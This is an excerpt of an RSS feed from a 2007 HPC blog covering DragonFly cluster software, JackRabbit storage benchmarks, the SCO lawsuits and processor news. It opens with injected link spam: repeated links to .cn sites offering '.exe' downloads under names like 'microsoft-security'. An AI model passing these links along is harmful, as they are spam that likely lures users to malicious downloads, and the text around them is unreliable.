&amp;lt;a href= http://6.exefiles.cn/adduserexe-resource-kit.html &amp;amp;rt;adduser.exe resource kit&amp;lt;/a&amp;amp;rt; [url=http://6.exefiles.cn/adduserexe-resource-kit.html]adduser.exe resource kit[/url] &amp;lt;a href= http://7.microsoft-security.cn/ntfrsexe.html &amp;amp;rt;ntfrs.exe&amp;lt;/a&amp;amp;rt; [url=http://7.microsoft-security.cn/ntfrsexe.html]ntfrs.exe[/url] &amp;lt;a href= http://7.exefiles.cn/jammerexe.html &amp;amp;rt;jammer.exe&amp;lt;/a&amp;amp;rt; [url=http://7.exefiles.cn/jammerexe.html]jammer.exe[/url] &amp;lt;a href= http://7.exefiles.cn/piv-pivbrowardschoolscom-pivexe.html &amp;amp;rt;piv piv.browardschools.com piv.exe&amp;lt;/a&amp;amp;rt; [url=http://7.exefiles.cn/piv-pivbrowardschoolscom-pivexe.html]piv piv.browardschools.com piv.exe[/url] &amp;lt;a href= http://10.antyspyware.cn/spdbvexe.html &amp;amp;rt;spdbv.exe&amp;lt;/a&amp;amp;rt; [url=http://10.antyspyware.cn/spdbvexe.html]spdbv.exe[/url] &amp;lt;a href= http://5.exefiles.cn/regenv32-has-caused-an-error-in-regenv32exe.html &amp;amp;rt;regenv32 has caused an error in regenv32.</description>
    </item>
    
    <item>
      <title>Duct tape, baling wire, and sealing wax</title>
      <link>https://blog.scalability.org/2007/10/duct-tape-baling-wire-and-sealing-wax/</link>
      <pubDate>Tue, 23 Oct 2007 06:19:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/duct-tape-baling-wire-and-sealing-wax/</guid>
      <description>None of the above were used in DragonFly, though sometimes, sometimes, it feels like it. DragonFly launched its first job this morning at 2am. 11 hours before the demo. Nah, thats not cutting it close &amp;hellip; not at all. The job is the same ptb.exe job from before. On 4 cpus, with 100000 iterations (the other one finishes too quickly).
Had to hardwire some bits to deal with bugs I need to fix.</description>
    </item>
    
    <item>
      <title>The power of good tools</title>
      <link>https://blog.scalability.org/2007/10/the-power-of-good-tools/</link>
      <pubDate>Mon, 22 Oct 2007 23:47:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/the-power-of-good-tools/</guid>
      <description>Ok, sort of another minor DragonFly milestone &amp;hellip; except that no code in DragonFly has changed. Previously, we pulled our job description from a file, and used it to create the job for us. Now, without changing a single line in the code, we have done this:
dragonfly@dragonfly:~/utilities$ ./build_job.pl --job=http://dragonfly:3001/jobs/xml/14 --program=ptb.xml --debug D[27064]: os = &#39;linux&#39; D[27064]: directory = &#39;/home/dragonfly/utilities&#39; D[27064]: opening temp file in directory .... D[27064]: parsing XML from job=&#39;http://dragonfly:3001/jobs/xml/14&#39; D[27064]: parsing XML from program=&#39;ptb.</description>
    </item>
    
    <item>
      <title>And yet another learning moment</title>
      <link>https://blog.scalability.org/2007/10/and-yet-another-learning-moment/</link>
      <pubDate>Tue, 16 Oct 2007 22:39:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/and-yet-another-learning-moment/</guid>
      <description>No, won&amp;rsquo;t get into detail. Sometimes in the course of business you realize that the people speaking to you have expectations that are entirely out of alignment with yours. After spending months in a careful and cautious dance to make sure that they are in fact in alignment. I learned a great deal today. Saddened by the course of events, but I learned.</description>
    </item>
    
    <item>
      <title>DragonFly milestone</title>
      <link>https://blog.scalability.org/2007/10/dragonfly-milestone/</link>
      <pubDate>Tue, 16 Oct 2007 02:15:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/dragonfly-milestone/</guid>
      <description>A long time ago, on a computer not so far away, we built a program called &amp;ldquo;SICE&amp;rdquo;. Yeah, I am not known for naming things well. SICE&amp;rsquo;s entire purpose in life was to be a user centric interface to HPC systems. When users wanted to run jobs, they filled out a web form that described the job, and off it went. This was not similar to other things out there in the market.</description>
    </item>
    
    <item>
      <title>Interesting comment from one of the largest vendors of computers</title>
      <link>https://blog.scalability.org/2007/10/interesting-comment-from-one-of-the-largest-vendors-of-computers/</link>
      <pubDate>Sun, 14 Oct 2007 13:28:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/interesting-comment-from-one-of-the-largest-vendors-of-computers/</guid>
      <description>The arguments for vendor support of Linux are simple economics. In HPC this usually means that a vendor has a reasonable expectation of return on their investment if they support Linux. This is a valid view if you have something of value that people want at a price they are willing to pay. The arguments for computer vendor support of Linux are again, simple economics. If Linux is driving business, you expect a vendor to pay attention.</description>
    </item>
    
    <item>
      <title>Vote for your favorite HPC technologies at HPCwire</title>
      <link>https://blog.scalability.org/2007/10/vote-for-your-favorite-hpc-technologies-at-hpcwire/</link>
      <pubDate>Thu, 11 Oct 2007 16:31:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/vote-for-your-favorite-hpc-technologies-at-hpcwire/</guid>
      <description>[to vote, go to this link ] I received this email from HPCwire:
You know, we happen to have this terrific high performance storage system, that generates incredible performance at a highly aggressive price &amp;hellip; If you think it is worth spending some electrons/clock cycles on, please go to their link and vote. If you like what you may have read about JackRabbit here or elsewhere, please, by all means, let them know.</description>
    </item>
    
    <item>
      <title>[head shakes in disbelief]</title>
      <link>https://blog.scalability.org/2007/10/head-shakes-in-disbelief/</link>
      <pubDate>Wed, 10 Oct 2007 19:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/head-shakes-in-disbelief/</guid>
      <description>I saw this posted as an update from Groklaw.
I think I said something to the effect of [
](http://scalability.org/?p=417) just a few days ago. Turns out that it doesn&amp;rsquo;t appear to be just in private. The Microsoft folks could do great things in the HPC space if there was a little less NIH and a bit more &amp;ldquo;hey lets work with the community&amp;rdquo;. Unfortunately, with a CEO making statements like this, it is a little hard to convince the community that you want to, I dunno, work with them as opposed to suing them.</description>
    </item>
    
    <item>
      <title>Ubuntu kernels: is anyone paying attention???</title>
      <link>https://blog.scalability.org/2007/10/ubuntu-kernels-is-anyone-paying-attention/</link>
      <pubDate>Wed, 10 Oct 2007 16:05:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/ubuntu-kernels-is-anyone-paying-attention/</guid>
      <description>I have noticed this now on my laptop, on JackRabbit, on a few other systems. The Ubuntu kernels are thrashing with context switches. 4000-5000 or so per second, and fast machines are rendered sluggish. So we build our own. Did that for Ubuntu thus far, and it has been good. Context switches per second down around 100 or so at idle. Where they should be.
I just wonder if anyone at Canonical is paying attention to this.</description>
    </item>
    
    <item>
      <title>Last time, on as the FOSS turns, ...</title>
      <link>https://blog.scalability.org/2007/10/last-time-on-as-the-foss-turns/</link>
      <pubDate>Tue, 09 Oct 2007 15:23:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/last-time-on-as-the-foss-turns/</guid>
      <description>Just as Linux and HPC on Linux clears the SCO debacle, new FUD from a familiar source. Yup, our buddy is up to his old tricks. Groklaw has the story. Some snippets:
Well, yes. Of course. And in the court of public opinion, we see the response. Linux usage is increasing by the per unit data, which doesn&amp;rsquo;t count reloaded/remissioned systems (we have done several for customers recently, whereby their data will count in the windows column as that is what they shipped with, though they are running Linux now, and this is not counting in any column).</description>
    </item>
    
    <item>
      <title>Going for the fall ...</title>
      <link>https://blog.scalability.org/2007/10/going-for-the-fall/</link>
      <pubDate>Sun, 07 Oct 2007 00:03:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/going-for-the-fall/</guid>
      <description>Well, the circus and legal theatre that SCO has created for itself is not quite over yet. Novell appears to be doing something along the lines of what I suggested.
I wrote this:
And today, I read on an article linked from /. that
&amp;hellip; or they may run out of Novell&amp;rsquo;s money, fighting Novell who wants to take possession of Novell&amp;rsquo;s money.
I won&amp;rsquo;t speculate whether or not this motion would be granted.</description>
    </item>
    
    <item>
      <title>We hit the big time ...</title>
      <link>https://blog.scalability.org/2007/10/we-hit-the-big-time/</link>
      <pubDate>Fri, 05 Oct 2007 05:23:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/we-hit-the-big-time/</guid>
      <description>On HPCwire this week, John West included a short summary of our annoucement. At least no one has set up a slashdot submission &amp;hellip; yet. If I see the server load roll past 1000 I know I have been hit by the /. effect. That and hearing silicon whimper&amp;hellip; Hmmm&amp;hellip; maybe that is a good benchmark for JR, put it up as a web server, submit a /. and let er rip :)</description>
    </item>
    
    <item>
      <title>Wherefore art thou, oh Socket 1207/771 CPU cooler?</title>
      <link>https://blog.scalability.org/2007/10/wherefore-art-thou-oh-socket-1207771-cpu-cooler/</link>
      <pubDate>Wed, 03 Oct 2007 15:21:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/wherefore-art-thou-oh-socket-1207771-cpu-cooler/</guid>
      <description>It seems that the choice in CPU cooling solutions for these two sockets (Opteron/Xeon) is slim at best. I guess they aren&amp;rsquo;t volume sellers. What I don&amp;rsquo;t get is why the powers that be sought to invent yet-another-new-cooling-solution-requirement that does a good job of fragmenting the market, and insuring limited supply of reasonable cooling systems.
Well, the Intel boxed processors at least come with cpu fans and coolers. As of socket 1207, Opterons no longer do.</description>
    </item>
    
    <item>
      <title>Ohio Linux Fest</title>
      <link>https://blog.scalability.org/2007/10/ohio-linux-fest/</link>
      <pubDate>Tue, 02 Oct 2007 21:04:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/ohio-linux-fest/</guid>
      <description>I was down at OLF with a JackRabbit and a Pegasus workstation. The rest of the booths had filled up, so they placed us near the coffee. Lets see, coffee, IT people &amp;hellip; Hmmm&amp;hellip;. They musta liked us ! Some friends helped out getting the mini booth up. I put out some pens, 150 JackRabbit pages (couldn&amp;rsquo;t possibly burn through those, right? I figured we would get rid of 20 or so at best).</description>
    </item>
    
    <item>
      <title>Woo hoo, the Quad core Opterons are here!</title>
      <link>https://blog.scalability.org/2007/10/woo-hoo-the-quad-core-opterons-are-here/</link>
      <pubDate>Tue, 02 Oct 2007 21:01:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/woo-hoo-the-quad-core-opterons-are-here/</guid>
      <description>(aka I can buy them in the market &amp;hellip;) See Newegg.</description>
    </item>
    
    <item>
      <title>MPI Class</title>
      <link>https://blog.scalability.org/2007/10/mpi-class/</link>
      <pubDate>Mon, 01 Oct 2007 14:02:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/mpi-class/</guid>
      <description>I taught the first half of an MPI class for a university last friday. It was fun, I showed them how to engineer an application for maximum scalability, as well as how to do basic message passing. There isn&amp;rsquo;t a great deal we can do in a single day, but I did start to get into some of the minutae of MPI programming. It is hard for people to think in parallel.</description>
    </item>
    
    <item>
      <title>Another update: 48TB JackRabbit available for under $1/GB</title>
      <link>https://blog.scalability.org/2007/10/another-update-48tb-jackrabbit-available-for-under-1gb/</link>
      <pubDate>Mon, 01 Oct 2007 13:55:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/another-update-48tb-jackrabbit-available-for-under-1gb/</guid>
      <description>Almost forgot to mention. Our 48 TB unit is now available for under $1/GB (e.g. less than $48k). This is, as far as we know, the densest storage server/appliance available on the market today. See the full product line with pricing data on the JackRabbit site.</description>
    </item>
    
    <item>
      <title>How pricing has changed over time ...</title>
      <link>https://blog.scalability.org/2007/10/how-pricing-has-changed-over-time/</link>
      <pubDate>Mon, 01 Oct 2007 13:51:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/how-pricing-has-changed-over-time/</guid>
      <description>Wow&amp;hellip; we ran through a pricing update for JackRabbit last week in preparation for several marketing events/shows, and wow &amp;hellip; what a difference several months make. Everything (but the chassis) has fallen significantly in price. Which means we were able to lower our prices, significantly. Looking at the gamut, only at the very low end of the offerings, is the pricing greater than $1/GB. Everywhere else, the pricing is less than $1/GB.</description>
    </item>
    
    <item>
      <title>Raw data</title>
      <link>https://blog.scalability.org/2007/09/raw-data/</link>
      <pubDate>Sun, 23 Sep 2007 17:31:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/raw-data/</guid>
      <description>So here are are generating load for a JackRabbit test. A prospective partner wants to know what it can handle. Fair enough, we would like to know if we can push it to its limits. Basic test: 4-way channel bond gigabit, with NFS export. 4 client machines mounting this, all generating load via iozone. Iozone run like this:
I started out with a motley crew of client hosts, all running whatever version of Linux, figuring this would be fine.</description>
    </item>
    
    <item>
      <title>IOzone out where the buffalo roam ...</title>
      <link>https://blog.scalability.org/2007/09/iozone-out-where-the-buffalo-roam/</link>
      <pubDate>Thu, 20 Sep 2007 14:12:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/iozone-out-where-the-buffalo-roam/</guid>
      <description>or something like that. Running IOzone (slightly modified to be able to run in a region far outside cache) on JackRabbit-s. 8TB raw, using a 5.5TB partition of 13 drives in a RAID6. Run is done via
As soon as it finishes, I will put the excel file up for download. We are seeing pretty good performance. Here is a snippet:
[ ](http://scalability.org/images/iozone-big.png)
The file sizes are 64 GB, 128 GB, 256 GB, 512 GB, and 1 TB (last row).</description>
    </item>
    
    <item>
      <title>Ok, that does it</title>
      <link>https://blog.scalability.org/2007/09/ok-that-does-it/</link>
      <pubDate>Mon, 17 Sep 2007 23:55:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/ok-that-does-it/</guid>
      <description>After reading this
at that bastion of high value reporting, Valleywag, I am henceforce going to borrow &amp;hellip; er &amp;hellip; steal &amp;hellip; er &amp;hellip; use Amir&amp;rsquo;s idea and call HPC what it really is. Social (and physical) networking for highly autistic AI Processing elements. Yeah, they are highly focused. On computing. And networking. Need a name for this.
I know, SNAP. Yeah. There we go. And a logo.
[ ](http://scalability.org/images/snap.jpg)</description>
    </item>
    
    <item>
      <title>Panta closes, LightSpace Technology put on ice</title>
      <link>https://blog.scalability.org/2007/09/panta-closes-lightspace-technology-put-on-ice/</link>
      <pubDate>Mon, 17 Sep 2007 22:57:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/panta-closes-lightspace-technology-put-on-ice/</guid>
      <description>I had not written about this two weeks ago when I learned of it, but Panta Systems, a pioneer in flexible HPC and computing systems, closed its doors. Details are sketchy, basically they were unable to find a buyer is what I have heard. They were pursuing VC money about a year ago, though I am not sure what happened. Best guess, based upon conversations, was that they ran out of money.</description>
    </item>
    
    <item>
      <title>The future of Cell ?</title>
      <link>https://blog.scalability.org/2007/09/the-future-of-cell/</link>
      <pubDate>Mon, 17 Sep 2007 22:39:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/the-future-of-cell/</guid>
      <description>In an article today, a report noted that Sony may be trying to sell off its fabs that make the Cell BE processor. This is, to quote the article
Remember, there are 3 partners working on this: IBM, Sony, and Toshiba. Sony is using these in the PS3, which by all accounts are not selling well. PS3&amp;rsquo;s are badly crippled for computing (rumor has it that this is the case as a result of an agreement with IBM), and are having a hard time against Wii and others.</description>
    </item>
    
    <item>
      <title>More comments this weekend on SCO</title>
      <link>https://blog.scalability.org/2007/09/more-comments-this-weekend-on-sco/</link>
      <pubDate>Mon, 17 Sep 2007 04:47:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/more-comments-this-weekend-on-sco/</guid>
      <description>It turns out that others, who know far more about the law than I do (I am not a lawyer, and don&amp;rsquo;t give legal advice) are suggesting that chapter 11 is less likely. They did a similar analysis, though with more legal detail. Worth the read. The punchline is that someone may have advised them that this was a good idea, and that an external analysis seems to show that this plan was a very bad one for SCO.</description>
    </item>
    
    <item>
      <title>Saying it out loud</title>
      <link>https://blog.scalability.org/2007/09/saying-it-out-loud/</link>
      <pubDate>Sat, 15 Sep 2007 22:04:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/saying-it-out-loud/</guid>
      <description>Ok, I need to ask this. Was the September 10th Barcelona launch, a paper launch? I can&amp;rsquo;t seem to find any in the channel. We have customers interested in them, and yes, I can get pricing. But delivery? Or delivery dates? Hmmmmmmmmmm&amp;hellip;.. AMD, please remember my suggestion for 8 core. It shouldn&amp;rsquo;t be hard. And if you don&amp;rsquo;t do something like that I can guarantee your competitor will.</description>
    </item>
    
    <item>
      <title>SCO asks court to protect it from having to pay its acknowledged debts</title>
      <link>https://blog.scalability.org/2007/09/sco-asks-court-to-protect-it-from-having-to-pay-its-acknowledged-debts/</link>
      <pubDate>Sat, 15 Sep 2007 01:07:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/sco-asks-court-to-protect-it-from-having-to-pay-its-acknowledged-debts/</guid>
      <description>Yes, SCO filed for chapter 11 protection from its creditors today. I guess I find it odd, as they did not appear to be in debt. Call me naive, but, in order to get Chapter 11 protection, mustn&amp;rsquo;t you already be in debt and unable to pay your creditors? From our friends at Yahoo:
That is, SCO has no debt on its balance sheet. Oh, that is, unless they came around to Novell&amp;rsquo;s position.</description>
    </item>
    
    <item>
      <title>Quote of the day ... from The Inquirer</title>
      <link>https://blog.scalability.org/2007/09/quote-of-the-day-from-the-inquirer/</link>
      <pubDate>Wed, 12 Sep 2007 18:56:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/quote-of-the-day-from-the-inquirer/</guid>
      <description>Ok, this was perfect for a sleepy wednesday &amp;hellip; I haven&amp;rsquo;t said much about Barcelona. Yeah, it released. Yeah, I want to play with some. No, I don&amp;rsquo;t have any (big hint there AMD&amp;hellip;.) The Inquirer has an article on power, and some of the press (mis)interactions currently going on with AMD. And a little commentary. This gem was in the commentary &amp;hellip;
Yeah, well, thats about the size of it.</description>
    </item>
    
    <item>
      <title>Some JackRabbit-S benchmarks</title>
      <link>https://blog.scalability.org/2007/09/some-jackrabbit-s-benchmarks/</link>
      <pubDate>Wed, 12 Sep 2007 16:49:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/some-jackrabbit-s-benchmarks/</guid>
      <description>Have a new JackRabbit-S unit in the lab, 5.5TB (16 drive unit, 2 allocated for OS, 1 for hot spare, RAID6 built out of remaining 13 drives).
and dbench output
a really simple script: #!/bin/bash sync echo -n &amp;quot;start at &amp;quot; date dd if=/dev/zero of=/local/big.file bs=134217728 count=100 oflag=direct sync echo -n &amp;quot;stop at &amp;quot; date and its results
Hmmm&amp;hellip;. on a 16 GB machine, even with the sync&amp;rsquo;s I am worried about cache.</description>
    </item>
    
    <item>
      <title>Sun snags CFS/Lustre</title>
      <link>https://blog.scalability.org/2007/09/sun-snags-cfslustre/</link>
      <pubDate>Wed, 12 Sep 2007 15:19:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/sun-snags-cfslustre/</guid>
      <description>See this PR. Since HP, IBM, etc all support Lustre on their systems (as does my $day job), this should prove to be interesting. Will they keep supporting it, or run away to pNFS? I suspect the latter.
Storage clusters are going into overdrive. Storage software is growing rapidly, especially the clustered software. Go figure.</description>
    </item>
    
    <item>
      <title>Core memory returns ...</title>
      <link>https://blog.scalability.org/2007/09/core-memory-returns/</link>
      <pubDate>Wed, 12 Sep 2007 01:22:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/core-memory-returns/</guid>
      <description>I saw this linked off of /.. Core memory returns, though this core memory is not using magnetization of cores, but motion of cores. Since this is mechanical, I wonder how they are going to protect against shocks sufficient to exceed the coefficient of static friction &amp;hellip; not to mention eigen-modes of the long racetrack wires. This should be fun to watch as it develops.икони</description>
    </item>
    
    <item>
      <title>I admit it ... I like Clovertown</title>
      <link>https://blog.scalability.org/2007/09/i-admit-it-i-like-clovertown/</link>
      <pubDate>Fri, 07 Sep 2007 15:47:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/i-admit-it-i-like-clovertown/</guid>
      <description>I have a desktop box here, 8 cores, 8 GB ram, using it for some development and testing. This is a nice box. Not expensive. Linux on it (OpenSuSE 10.2), and some disk (900GB). All it needs is a good graphics card and it is an awesome workstation. The graphics card I am using now is the motherboard adapter based unit. It is sweet to be doing compiles and simply type &amp;ldquo;make -j8&amp;rdquo; and have this puppy crank.</description>
    </item>
    
    <item>
      <title>NetApp sues Sun over patents in ZFS</title>
      <link>https://blog.scalability.org/2007/09/netapp-sues-sun-over-patents-in-zfs/</link>
      <pubDate>Thu, 06 Sep 2007 11:56:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/netapp-sues-sun-over-patents-in-zfs/</guid>
      <description>See this link . Not good for ZFS. A day after someone posted an amusing and somewhat contradictory set of reasons why they preferred Sun x4500 to JackRabbit (including the &amp;ldquo;if a RAID card fails you have to replace it, and this is bad&amp;rdquo; in close temporal proximity to &amp;ldquo;the SATA controller failed and we had to replace the motherboard&amp;rdquo;, with the first offered up as to why JackRabbit was not as good as x4500, and the second as to why x4500 was better &amp;hellip; you can read this amusing gem on the beowulf list if you wish &amp;hellip;) we see ZFS being attacked on patent grounds.</description>
    </item>
    
    <item>
      <title>Solaris v. Linux:  The &#34;I&#39;m not dead yet&#34; battle</title>
      <link>https://blog.scalability.org/2007/09/solaris-v-linux-the-im-not-dead-yet-battle/</link>
      <pubDate>Tue, 04 Sep 2007 13:37:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/solaris-v-linux-the-im-not-dead-yet-battle/</guid>
      <description>The market has largely converged on two OSes going forward. Unix demand and sales have been giving way according to IDC and others for the past few years. Linux has been and continues to take market and mind share away from it. Most OEMs realize this. There was a legal battle over this, now preparing for the fat lady with the Viking hat to start belting out her tune.
And in a Monty Python-esque manner, one of the combatants says &amp;ldquo;I&amp;rsquo;m not dead yet, I think I will go for a walk&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Whither Barcelona?  Well, here ...</title>
      <link>https://blog.scalability.org/2007/09/whither-barcelona-well-here/</link>
      <pubDate>Tue, 04 Sep 2007 13:07:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/whither-barcelona-well-here/</guid>
      <description>Barcelona vs Xeon. 2.0 GHz Barcelona vs 2.33 GHz Clovertown. Punchline: SpecFP 78 for Barcelona, 60 for Xeon. Must be an old video. Xeon 5345 is not the highest performing Xeon, that is the 5365 at 3 GHz. About 29% &amp;ldquo;faster&amp;rdquo; than the 2.33 GHz version. This should put the 3 GHz Xeon on performance parity with the 2GHz Barcelona. But the Barcelona has a better memory system. And a better internal processor &amp;ldquo;bus&amp;rdquo; (yeah, not a bus, but a fabric).</description>
    </item>
    
    <item>
      <title>IDC server numbers for most recent quarter/year</title>
      <link>https://blog.scalability.org/2007/08/idc-server-numbers-for-most-recent-quarteryear/</link>
      <pubDate>Fri, 24 Aug 2007 17:45:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/idc-server-numbers-for-most-recent-quarteryear/</guid>
      <description>This is useful in various contexts. We keep hearing from various quarters about how well they are doing, &amp;ldquo;beating&amp;rdquo; the competition. Well, at the end of the day, its what people do, not what they say that matters. From Supercomputingonline:
Ok, lets work a little math: 1.8B$/5.0B$ US is &amp;hellip; 0.36 That is the newly purchased Linux server market is 36% the size of the newly purchased windows server market, and growing.</description>
    </item>
    
    <item>
      <title>Sun to become Java?</title>
      <link>https://blog.scalability.org/2007/08/sun-to-become-java/</link>
      <pubDate>Fri, 24 Aug 2007 13:27:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/sun-to-become-java/</guid>
      <description>This morning, /. reports
Ok, its not their name. Just their ticker symbol. But why? Well their CEO says something here &amp;hellip;
[wipes monitor from spewed coffee] Quoting Inigo Montoya
I make no bones about that I think Java is massively overhyped, overblown. It is a solution looking for a problem from the previous decade, which really didn&amp;rsquo;t exist back then either. But today we are stuck with its 32 bit legacy.</description>
    </item>
    
    <item>
      <title>The future of HPC</title>
      <link>https://blog.scalability.org/2007/08/the-future-of-hpc/</link>
      <pubDate>Fri, 24 Aug 2007 04:34:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/the-future-of-hpc/</guid>
      <description>Some of us have been arguing for a while that the future of HPC is aSMP (asymmetric processing) or heterogeneous processing. Others have argued that the future is massive multicore. In the aSMP world view, there are camps forming between RC (reconfigurable computing) and GPU/Cell-like computing. Here is what is interesting. In an article just posted in HPCWire, an &amp;ldquo;anonymous&amp;rdquo; writer, whom in the past has argued the vector case strenuously, makes an extremely good analysis of the issues in front of us.</description>
    </item>
    
    <item>
      <title>Tilera</title>
      <link>https://blog.scalability.org/2007/08/tilera/</link>
      <pubDate>Tue, 21 Aug 2007 16:06:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/tilera/</guid>
      <description>Over at Accelerated Times, an article was posted about the Tilera. Now I haven&amp;rsquo;t heard much about Tilera, other than pre-releases. [update: look at the comment here] The author focuses on several important aspects. The business model, the money raise, are they are where they say they are.
What strikes me is that if they raised a B-round, this usually &amp;hellip; usually happens post initial revenue, when you start to see interest and traction.</description>
    </item>
    
    <item>
      <title>A new blog</title>
      <link>https://blog.scalability.org/2007/08/a-new-blog/</link>
      <pubDate>Tue, 21 Aug 2007 15:18:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/a-new-blog/</guid>
      <description>Have a look at Accelerated Times.</description>
    </item>
    
    <item>
      <title>The fat lady is about to sing</title>
      <link>https://blog.scalability.org/2007/08/the-fat-lady-is-about-to-sing/</link>
      <pubDate>Tue, 21 Aug 2007 04:55:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/the-fat-lady-is-about-to-sing/</guid>
      <description>(relevance to HPC: some of the companies that effectively bankrolled this effort have been trying to leverage it against Linux, in the HPC space, and have managed to cause customers confusion. ..) Can&amp;rsquo;t get any more cliche&#39; than that. /. links to an arstechnica article on SCO. Turns out the ruling knocked out any pillar of hope for thie rapidly fading company. Their only real hope now is for a white knight.</description>
    </item>
    
    <item>
      <title>There are times when I ask myself why...</title>
      <link>https://blog.scalability.org/2007/08/there-are-times-when-i-ask-myself-why/</link>
      <pubDate>Tue, 21 Aug 2007 04:25:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/there-are-times-when-i-ask-myself-why/</guid>
      <description>This is a very short missive about Java. I am tired of a complete lack of official 64 bit support for Java in browsers. Then again, using Java in your browser is a pretty sure way to crash your browser. It certainly makes fast systems slow, and slow systems unusable. I think it is time we all took Nancy Reagan&amp;rsquo;s advice, and &amp;ldquo;just say no&amp;rdquo; to Java. Its waaaaay past time.</description>
    </item>
    
    <item>
      <title>DragonFly ... pre pre alpha</title>
      <link>https://blog.scalability.org/2007/08/dragonfly-pre-pre-alpha/</link>
      <pubDate>Mon, 20 Aug 2007 23:38:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/dragonfly-pre-pre-alpha/</guid>
      <description>I mean really, pre pre pre &amp;hellip; pre alpha. Did I mention that it is pre pre pre &amp;hellip; pre alpha? Takes flight here. Still a ways to go. RIP SICE. Update: DragonFly is our next gen user interface for clusters. SICE is our previous gen, it had been around for years, and was long in the tooth. DragonFly will be dual licensed, and as soon as we get all the hooks together, we will release code.</description>
    </item>
    
    <item>
      <title>Acceleration meme</title>
      <link>https://blog.scalability.org/2007/08/acceleration-meme/</link>
      <pubDate>Mon, 20 Aug 2007 14:46:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/acceleration-meme/</guid>
      <description>Amir at Reconfigurable Computing Blog (welcome back Amir!) notes
We have been making the arguments (and pitching) accelerated computing for years. Almost half a decade. Scary. We see in other peoples marketing materials, pitches, etc things we have said years ago. In one particularly egregious example, a potential competitor had some of our slides in their online presentation. Makes you really love to deal with &amp;ldquo;no-NDA&amp;rdquo; VCs. I agree with Amir that the meme has been catching on for a while.</description>
    </item>
    
    <item>
      <title>The good, the bad, and the ugly</title>
      <link>https://blog.scalability.org/2007/08/the-good-the-bad-and-the-ugly/</link>
      <pubDate>Sat, 18 Aug 2007 22:32:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/the-good-the-bad-and-the-ugly/</guid>
      <description>Why do we blog, and why do we read blogs, and what does what we read and write say about who we are, what we think, and how we act? Robin at Storagemojo (great blog) talks about the nuances of corporate blogging, and shows some stuff from IBM on the policies of blogging, as well as some stuff from an informal EMC blogger. This is interesting, and as Robin points out, the IBM policy has a particularly valuable set of guidelines.</description>
    </item>
    
    <item>
      <title>buh-dee buh-dee  buh-dee ... dats all folks!</title>
      <link>https://blog.scalability.org/2007/08/buh-dee-buh-dee-buh-dee-dats-all-folks/</link>
      <pubDate>Sat, 11 Aug 2007 03:49:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/buh-dee-buh-dee-buh-dee-dats-all-folks/</guid>
      <description>(the above is an attempt at putting into text, what the character &amp;ldquo;Porky Pig&amp;rdquo; says when he wraps up a short cartoon) Apparently SCO is now, quite officially, down for the count, and the count has begun in earnest. According to PJ at Groklaw, we see
That is almost all she wrote. The proverbial fat lady is warming up and will be coming on stage soon. SCO claimed that Linux infringed upon the code it claimed owned, and was copied.</description>
    </item>
    
    <item>
      <title>A petaflop here, a petaflop there, and pretty soon you are talking about real supercomputing</title>
      <link>https://blog.scalability.org/2007/08/a-petaflop-here-a-petaflop-there-and-pretty-soon-you-are-talking-about-real-supercomputing/</link>
      <pubDate>Thu, 09 Aug 2007 04:15:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/a-petaflop-here-a-petaflop-there-and-pretty-soon-you-are-talking-about-real-supercomputing/</guid>
      <description>NSF formally announced their awards which other had hinted at over the past few weeks. These machines will be &amp;ldquo;500x faster than todays supercomputers&amp;rdquo;. How this will occur in 5 years, is well, not know. Moore&amp;rsquo;s law (if it holds) gives us an order of magnitude in 5.5 years or so. So thats 50x faster than Moore&amp;rsquo;s law following units.
Your options here are a) make more of them, or b) make em faster.</description>
    </item>
    
    <item>
      <title>Why something other than windows is likely to win the desktops</title>
